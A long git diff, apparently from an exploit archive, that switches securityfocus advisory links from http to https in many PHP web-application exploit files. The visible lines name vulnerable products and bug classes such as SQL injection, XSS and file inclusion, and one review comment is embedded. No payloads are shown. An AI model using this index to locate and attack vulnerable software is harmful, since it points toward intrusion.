@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21817/info +source: https://www.securityfocus.com/bid/21817/info Mobilelib GOLD is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29375.txt b/exploits/php/webapps/29375.txt index 10d11eed3..0f206a8e7 100644 --- a/exploits/php/webapps/29375.txt +++ b/exploits/php/webapps/29375.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21843/info +source: https://www.securityfocus.com/bid/21843/info Simplog is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/29376.txt b/exploits/php/webapps/29376.txt index ca2cd9777..b4030c09f 100644 --- a/exploits/php/webapps/29376.txt +++ b/exploits/php/webapps/29376.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21844/info +source: https://www.securityfocus.com/bid/21844/info vCard PRO is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29377.txt b/exploits/php/webapps/29377.txt index 2857037bc..b66465b22 100644 --- a/exploits/php/webapps/29377.txt +++ b/exploits/php/webapps/29377.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21845/info +source: https://www.securityfocus.com/bid/21845/info AShop Deluxe and AShop Administration Panel are prone to multiple cross-site scripting vulnerabilities because they fail to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/29378.txt b/exploits/php/webapps/29378.txt index 6557cc1f8..cff1f6d75 100644 --- a/exploits/php/webapps/29378.txt +++ b/exploits/php/webapps/29378.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21845/info +source: https://www.securityfocus.com/bid/21845/info AShop Deluxe and AShop Administration Panel are prone to multiple cross-site scripting vulnerabilities because they fail to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/29379.txt b/exploits/php/webapps/29379.txt index 2c6a9eba1..7b8ff72d4 100644 --- a/exploits/php/webapps/29379.txt +++ b/exploits/php/webapps/29379.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21845/info +source: https://www.securityfocus.com/bid/21845/info AShop Deluxe and AShop Administration Panel are prone to multiple cross-site scripting vulnerabilities because they fail to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/29380.txt b/exploits/php/webapps/29380.txt index fb4da601e..cb649a156 100644 --- a/exploits/php/webapps/29380.txt +++ b/exploits/php/webapps/29380.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21845/info +source: https://www.securityfocus.com/bid/21845/info AShop Deluxe and AShop Administration Panel are prone to multiple cross-site scripting vulnerabilities because they fail to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/29381.txt b/exploits/php/webapps/29381.txt index e9a5eb862..29c9d5701 100644 --- a/exploits/php/webapps/29381.txt +++ b/exploits/php/webapps/29381.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21845/info +source: https://www.securityfocus.com/bid/21845/info AShop Deluxe and AShop Administration Panel are prone to multiple cross-site scripting vulnerabilities because they fail to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/29382.txt b/exploits/php/webapps/29382.txt index 4a39c3d07..4520f19bc 100644 --- a/exploits/php/webapps/29382.txt +++ b/exploits/php/webapps/29382.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21845/info +source: https://www.securityfocus.com/bid/21845/info AShop Deluxe and AShop Administration Panel are prone to multiple cross-site scripting vulnerabilities because they fail to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/29384.txt b/exploits/php/webapps/29384.txt index 8d97128b0..de6a0645a 100644 --- a/exploits/php/webapps/29384.txt +++ b/exploits/php/webapps/29384.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21880/info +source: https://www.securityfocus.com/bid/21880/info RI Blog is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29397.php b/exploits/php/webapps/29397.php index 13094ddae..c27858d08 100644 --- a/exploits/php/webapps/29397.php +++ b/exploits/php/webapps/29397.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21894/info +source: https://www.securityfocus.com/bid/21894/info Coppermine Photo Gallery is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/29404.txt b/exploits/php/webapps/29404.txt index 11899d945..f0639e7d4 100644 --- a/exploits/php/webapps/29404.txt +++ b/exploits/php/webapps/29404.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21956/info +source: https://www.securityfocus.com/bid/21956/info MediaWiki is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29405.txt b/exploits/php/webapps/29405.txt index b985c972c..89d31434d 100644 --- a/exploits/php/webapps/29405.txt +++ b/exploits/php/webapps/29405.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21962/info +source: https://www.securityfocus.com/bid/21962/info PHPKIT is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/29407.txt b/exploits/php/webapps/29407.txt index 90396b1f4..8b7d8bbd5 100644 --- a/exploits/php/webapps/29407.txt +++ b/exploits/php/webapps/29407.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29408.txt b/exploits/php/webapps/29408.txt index 1e15ac167..0b3307346 100644 --- a/exploits/php/webapps/29408.txt +++ b/exploits/php/webapps/29408.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29409.txt b/exploits/php/webapps/29409.txt index 260853cb2..76b9722f6 100644 --- a/exploits/php/webapps/29409.txt +++ b/exploits/php/webapps/29409.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29410.txt b/exploits/php/webapps/29410.txt index 3e91bb5d4..64ac50ba0 100644 --- a/exploits/php/webapps/29410.txt +++ b/exploits/php/webapps/29410.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29411.txt b/exploits/php/webapps/29411.txt index 3dee50432..b46376bcb 100644 --- a/exploits/php/webapps/29411.txt +++ b/exploits/php/webapps/29411.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29412.txt b/exploits/php/webapps/29412.txt index 0a711ac3b..03c8fb697 100644 --- a/exploits/php/webapps/29412.txt +++ b/exploits/php/webapps/29412.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29413.txt b/exploits/php/webapps/29413.txt index 5eec9b639..2af62aba0 100644 --- a/exploits/php/webapps/29413.txt +++ b/exploits/php/webapps/29413.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29414.txt b/exploits/php/webapps/29414.txt index 61674781c..da5a5a336 100644 --- a/exploits/php/webapps/29414.txt +++ b/exploits/php/webapps/29414.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29415.txt b/exploits/php/webapps/29415.txt index a518f9d8c..6b2a25b66 100644 --- a/exploits/php/webapps/29415.txt +++ b/exploits/php/webapps/29415.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29416.txt b/exploits/php/webapps/29416.txt index 176ff008a..99f89e639 100644 --- a/exploits/php/webapps/29416.txt +++ b/exploits/php/webapps/29416.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29417.txt b/exploits/php/webapps/29417.txt index a66f769d9..d056391be 100644 --- a/exploits/php/webapps/29417.txt +++ b/exploits/php/webapps/29417.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29418.txt b/exploits/php/webapps/29418.txt index 8e8e70b57..b21b48e24 100644 --- a/exploits/php/webapps/29418.txt +++ b/exploits/php/webapps/29418.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29419.txt b/exploits/php/webapps/29419.txt index dc380898c..2d53c0c53 100644 --- a/exploits/php/webapps/29419.txt +++ b/exploits/php/webapps/29419.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29420.txt b/exploits/php/webapps/29420.txt index 2155d07ab..d3c4f0115 100644 --- a/exploits/php/webapps/29420.txt +++ b/exploits/php/webapps/29420.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29421.txt b/exploits/php/webapps/29421.txt index 7a5d8fffb..333490888 100644 --- a/exploits/php/webapps/29421.txt +++ b/exploits/php/webapps/29421.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29422.txt b/exploits/php/webapps/29422.txt index 7f8001946..b987a17b9 100644 --- a/exploits/php/webapps/29422.txt +++ b/exploits/php/webapps/29422.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29423.txt b/exploits/php/webapps/29423.txt index b7e1a7954..a8115eb57 100644 --- a/exploits/php/webapps/29423.txt +++ b/exploits/php/webapps/29423.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29424.txt b/exploits/php/webapps/29424.txt index c5dc28ac0..2f81bc31b 100644 --- a/exploits/php/webapps/29424.txt +++ b/exploits/php/webapps/29424.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29425.txt b/exploits/php/webapps/29425.txt index cb84677b9..aa4b406d0 100644 --- a/exploits/php/webapps/29425.txt +++ b/exploits/php/webapps/29425.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29426.txt b/exploits/php/webapps/29426.txt index 22af70424..51f21a284 100644 --- a/exploits/php/webapps/29426.txt +++ b/exploits/php/webapps/29426.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29427.txt b/exploits/php/webapps/29427.txt index b3a5ae67d..1455ad8d9 100644 --- a/exploits/php/webapps/29427.txt +++ b/exploits/php/webapps/29427.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29428.txt b/exploits/php/webapps/29428.txt index 45b050a04..b1ba6fc8e 100644 --- a/exploits/php/webapps/29428.txt +++ b/exploits/php/webapps/29428.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29429.txt b/exploits/php/webapps/29429.txt index 5fa3ed46d..7e860dbd4 100644 --- a/exploits/php/webapps/29429.txt +++ b/exploits/php/webapps/29429.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29430.txt b/exploits/php/webapps/29430.txt index 536bd1fab..be7223795 100644 --- a/exploits/php/webapps/29430.txt +++ b/exploits/php/webapps/29430.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29431.txt b/exploits/php/webapps/29431.txt index 982ff3ab7..ef3f64da2 100644 --- a/exploits/php/webapps/29431.txt +++ b/exploits/php/webapps/29431.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29432.txt b/exploits/php/webapps/29432.txt index 327a2bfbc..bf804ff61 100644 --- a/exploits/php/webapps/29432.txt +++ b/exploits/php/webapps/29432.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29433.txt b/exploits/php/webapps/29433.txt index f0f877b75..243d9322d 100644 --- a/exploits/php/webapps/29433.txt +++ b/exploits/php/webapps/29433.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29434.txt b/exploits/php/webapps/29434.txt index c1c62a367..ed078d08c 100644 --- a/exploits/php/webapps/29434.txt +++ b/exploits/php/webapps/29434.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29437.txt b/exploits/php/webapps/29437.txt index ed7010e75..0c547f762 100644 --- a/exploits/php/webapps/29437.txt +++ b/exploits/php/webapps/29437.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21967/info +source: https://www.securityfocus.com/bid/21967/info Easy Banner Pro is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29438.txt b/exploits/php/webapps/29438.txt index d64acfd4c..41a823b76 100644 --- a/exploits/php/webapps/29438.txt +++ b/exploits/php/webapps/29438.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21974/info +source: https://www.securityfocus.com/bid/21974/info Edit-x is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29442.html b/exploits/php/webapps/29442.html index 9cfb176be..dac716dd3 100644 --- a/exploits/php/webapps/29442.html +++ b/exploits/php/webapps/29442.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22001/info +source: https://www.securityfocus.com/bid/22001/info phpBB is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/29450.txt b/exploits/php/webapps/29450.txt index ba9f8e5d8..e22089d7a 100644 --- a/exploits/php/webapps/29450.txt +++ b/exploits/php/webapps/29450.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22029/info +source: https://www.securityfocus.com/bid/22029/info Ezboxx is prone to multiple input-validation vulnerabilities because the application fails to sufficiently sanitize user-supplied input. The vulnerabilities include an SQL-injection issue, multiple cross-site scripting issues, and a path-disclosure issue. diff --git a/exploits/php/webapps/29451.txt b/exploits/php/webapps/29451.txt index e6a5dd920..2b606ad40 100644 --- a/exploits/php/webapps/29451.txt +++ b/exploits/php/webapps/29451.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22032/info +source: https://www.securityfocus.com/bid/22032/info All In One Control Panel is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/29453.php b/exploits/php/webapps/29453.php index b3950d7b1..0c5f2c648 100644 --- a/exploits/php/webapps/29453.php +++ b/exploits/php/webapps/29453.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22037/info +source: https://www.securityfocus.com/bid/22037/info PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/29464.txt b/exploits/php/webapps/29464.txt index f83087009..b626045ef 100644 --- a/exploits/php/webapps/29464.txt +++ b/exploits/php/webapps/29464.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22068/info +source: https://www.securityfocus.com/bid/22068/info The 'liens_dynamiques' program is prone to a vulnerability that lets attackers bypass security restrictions. diff --git a/exploits/php/webapps/29466.txt b/exploits/php/webapps/29466.txt index d202e447c..befe305ec 100644 --- a/exploits/php/webapps/29466.txt +++ b/exploits/php/webapps/29466.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22070/info +source: https://www.securityfocus.com/bid/22070/info The 'liens_dynamiques' program is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29468.txt b/exploits/php/webapps/29468.txt index 9709c104d..3abdba161 100644 --- a/exploits/php/webapps/29468.txt +++ b/exploits/php/webapps/29468.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22072/info +source: https://www.securityfocus.com/bid/22072/info Jax Petitionbook is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29469.txt b/exploits/php/webapps/29469.txt index 2d8cb4468..c7a776e01 100644 --- a/exploits/php/webapps/29469.txt +++ b/exploits/php/webapps/29469.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22072/info +source: https://www.securityfocus.com/bid/22072/info Jax Petitionbook is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29472.txt b/exploits/php/webapps/29472.txt index 230455e9a..63025c8f4 100644 --- a/exploits/php/webapps/29472.txt +++ b/exploits/php/webapps/29472.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22078/info +source: https://www.securityfocus.com/bid/22078/info The 'dt_guestbook' program is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29474.txt b/exploits/php/webapps/29474.txt index bdf2685b0..ad50ba478 100644 --- a/exploits/php/webapps/29474.txt +++ b/exploits/php/webapps/29474.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22081/info +source: https://www.securityfocus.com/bid/22081/info SmE File Mailer is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/29477.txt b/exploits/php/webapps/29477.txt index 9b675f49b..b8e19d6a3 100644 --- a/exploits/php/webapps/29477.txt +++ b/exploits/php/webapps/29477.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22084/info +source: https://www.securityfocus.com/bid/22084/info Indexu is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29478.txt b/exploits/php/webapps/29478.txt index 342bae3e6..d8e61e27c 100644 --- a/exploits/php/webapps/29478.txt +++ b/exploits/php/webapps/29478.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22084/info +source: https://www.securityfocus.com/bid/22084/info Indexu is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29479.txt b/exploits/php/webapps/29479.txt index c574e00a5..3a9bd80de 100644 --- a/exploits/php/webapps/29479.txt +++ b/exploits/php/webapps/29479.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22084/info +source: https://www.securityfocus.com/bid/22084/info Indexu is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29480.txt b/exploits/php/webapps/29480.txt index ac53e73a7..c54644abf 100644 --- a/exploits/php/webapps/29480.txt +++ b/exploits/php/webapps/29480.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22084/info +source: https://www.securityfocus.com/bid/22084/info Indexu is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29481.txt b/exploits/php/webapps/29481.txt index bba068f4e..c2b4fd20d 100644 --- a/exploits/php/webapps/29481.txt +++ b/exploits/php/webapps/29481.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22084/info +source: https://www.securityfocus.com/bid/22084/info Indexu is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29483.txt b/exploits/php/webapps/29483.txt index 27fcd5e1a..02e30a315 100644 --- a/exploits/php/webapps/29483.txt +++ b/exploits/php/webapps/29483.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22084/info +source: https://www.securityfocus.com/bid/22084/info Indexu is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29484.txt b/exploits/php/webapps/29484.txt index 10cfbdf15..71e07c634 100644 --- a/exploits/php/webapps/29484.txt +++ b/exploits/php/webapps/29484.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22084/info +source: https://www.securityfocus.com/bid/22084/info Indexu is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29485.txt b/exploits/php/webapps/29485.txt index 234e54954..d15c2da1b 100644 --- a/exploits/php/webapps/29485.txt +++ b/exploits/php/webapps/29485.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22084/info +source: https://www.securityfocus.com/bid/22084/info Indexu is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. 
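Review bot: In the 29397.php, 29453.php and 29442.html hunks the rewritten `source:` line is line 1 of the file and is bare text, so the header is not inside a comment even though the extension says PHP or HTML. PHP emits anything outside `<?php` tags verbatim and a browser renders it as body text, which means the advisory header becomes part of the output if one of these files is ever served or run. Since line 1 is being touched anyway, consider wrapping the header block in the comment syntax of the file type, or note in the commit message that the header format is kept as-is deliberately.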
diff --git a/exploits/php/webapps/29486.txt b/exploits/php/webapps/29486.txt index 0a07959aa..b95d472b7 100644 --- a/exploits/php/webapps/29486.txt +++ b/exploits/php/webapps/29486.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22084/info +source: https://www.securityfocus.com/bid/22084/info Indexu is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29487.txt b/exploits/php/webapps/29487.txt index 9c67a30a2..fd463f9da 100644 --- a/exploits/php/webapps/29487.txt +++ b/exploits/php/webapps/29487.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22084/info +source: https://www.securityfocus.com/bid/22084/info Indexu is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29488.txt b/exploits/php/webapps/29488.txt index 565c78c0d..c405d92de 100644 --- a/exploits/php/webapps/29488.txt +++ b/exploits/php/webapps/29488.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22084/info +source: https://www.securityfocus.com/bid/22084/info Indexu is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29489.txt b/exploits/php/webapps/29489.txt index 5428d015f..84f9b29f2 100644 --- a/exploits/php/webapps/29489.txt +++ b/exploits/php/webapps/29489.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22084/info +source: https://www.securityfocus.com/bid/22084/info Indexu is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29491.txt b/exploits/php/webapps/29491.txt index 235fb5120..e6df3ba3a 100644 --- a/exploits/php/webapps/29491.txt +++ b/exploits/php/webapps/29491.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22097/info +source: https://www.securityfocus.com/bid/22097/info MyBloggie is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29492.txt b/exploits/php/webapps/29492.txt index 6e06c6203..3463922e5 100644 --- a/exploits/php/webapps/29492.txt +++ b/exploits/php/webapps/29492.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22097/info +source: https://www.securityfocus.com/bid/22097/info MyBloggie is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29497.txt b/exploits/php/webapps/29497.txt index 67b325fbc..76c6f3a35 100644 --- a/exploits/php/webapps/29497.txt +++ b/exploits/php/webapps/29497.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22141/info +source: https://www.securityfocus.com/bid/22141/info Easebay Resources Paypal Subscription Manager is prone to multiple input-validation vulnerabilities because the application fails to sufficiently sanitize user-supplied input. The vulnerabilities include an SQL-injection issue and a cross-site scripting issue. diff --git a/exploits/php/webapps/29498.txt b/exploits/php/webapps/29498.txt index 6b243b3e6..b3d14141b 100644 --- a/exploits/php/webapps/29498.txt +++ b/exploits/php/webapps/29498.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22142/info +source: https://www.securityfocus.com/bid/22142/info Easebay Resources Login Manager is prone to multiple input-validation vulnerabilities because the application fails to sufficiently sanitize user-supplied input. The vulnerabilities include an SQL-injection issue and a cross-site scripting issue. diff --git a/exploits/php/webapps/29499.txt b/exploits/php/webapps/29499.txt index ca7d2534f..2dd001515 100644 --- a/exploits/php/webapps/29499.txt 
+++ b/exploits/php/webapps/29499.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22143/info +source: https://www.securityfocus.com/bid/22143/info SMF is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/29504.txt b/exploits/php/webapps/29504.txt index 2bbd87878..30333bbfa 100644 --- a/exploits/php/webapps/29504.txt +++ b/exploits/php/webapps/29504.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22164/info +source: https://www.securityfocus.com/bid/22164/info Unique Ads is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/29505.txt b/exploits/php/webapps/29505.txt index d4137c18b..79fa6bd22 100644 --- a/exploits/php/webapps/29505.txt +++ b/exploits/php/webapps/29505.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22167/info +source: https://www.securityfocus.com/bid/22167/info 212cafeBoard is prone to multiple cross-site scripting vulnerabilities because the application fails to properly 